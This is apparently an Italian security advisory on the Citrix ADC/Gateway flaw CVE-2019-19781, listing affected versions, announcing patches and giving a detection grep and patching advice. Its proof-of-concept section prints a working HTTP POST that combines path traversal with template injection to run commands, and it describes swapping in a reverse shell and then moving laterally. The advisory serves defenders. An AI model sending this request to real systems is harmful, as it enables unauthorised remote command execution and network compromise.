Ieri è Iniziato il rilascio delle patch di Citrix per la vulnerabilità CVE 2019 -19781 pubblicata lo scorso dicembre
Rilascio delle patch di Citrix per la vulnerabilità CVE 2019 -19781
Ieri è Iniziato il rilascio delle patch di Citrix per la vulnerabilità CVE 2019 -19781 pubblicata lo scorso dicembre e presente nei seguenti prodotti:
- 13.0 Citrix ADC and Citrix Gateway all supported builds
- 12.1 Citrix ADC and NetScaler Gateway all supported builds
- 12.0 Citrix ADC and NetScaler Gateway all supported builds
- 11.1 Citrix ADC and NetScaler Gateway all supported builds
- 10.5 Citrix NetScaler ADC and NetScaler Gateway all supported builds
La patch è scaricabile a questo link
La vulnerabilità permette di accedere, tramite Directory Traversal, a file presenti nel file system di macchine Citrix. Successivamente, l’11 gennaio ne è stato pubblicato l’Exploit: lo script permette di sfruttare questa vulnerabilità in modo da ottenere l’accesso abusivo al sistema che ospita appunto applicazioni Citrix e Netscaler.
L’impatto di questa criticità è molto alto in quanto, una volta effettuata l’intrusione nel sistema, l’attaccante può usarlo come tramite per accedere ad altri sistemi comunicanti della stessa rete.
Proof of concept
L’Exploit pubblicato consente, tramite una richiesta HTTP, di eseguire dei comandi sul sistema operativo; come si può vedere nel seguente caso, utilizzando una singola richiesta HTTP POST, è possibile inserire comandi arbitrari da eseguire all’interno del parametro title.
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: example
User-Agent: curl/7.67.0
Accept: */*
NSC_USER: /../../../../../../../../../../netscaler/portal/templates/oUSClJpTIHS4HQigSr9kTDKYPO8baV2e
NSC_NONCE: test1337
Content-type: application/x-www-form-urlencoded
Content-Length: 187
Connection: close
url=http://example.com\&title=[%25+template.new({‘BLOCK’%3d’exec(\’whoami\’)%3b’})+%25]\&desc=test\&UI_inuse=RfWeb
Sostituendo il comando whoami con uno script che permette di eseguire una Reverse Shell, l’attaccante ottiene il controllo della macchina, consentendo l’esecuzione delle successive fasi di post-exploitation (Information Gathering, Privilege Escalation e Lateral Movement).
Una volta all’interno quindi è possibile ad esempio sfruttare altre vulnerabilità gravi e note come Eternal Blue e Blue Keep per compromettere anche altri sistemi presenti nella rete interna.
Per verificare se qualcuno ha tentato di sfruttare la vulnerabilità descritta, è possibile eseguire il comando grep -r “/../vpns” /var/log/http* sulla macchina Citrix. Nel caso in cui il sistema fosse stato compromesso l’output presenterebbe delle risposte HTTP con “Status Code 200”.
Raccomandiamo, a chiunque faccia uso dei prodotti suddetti, di applicare le patch rilasciate da Citrix perché, come descritto, la vulnerabilità in questione è molto critica.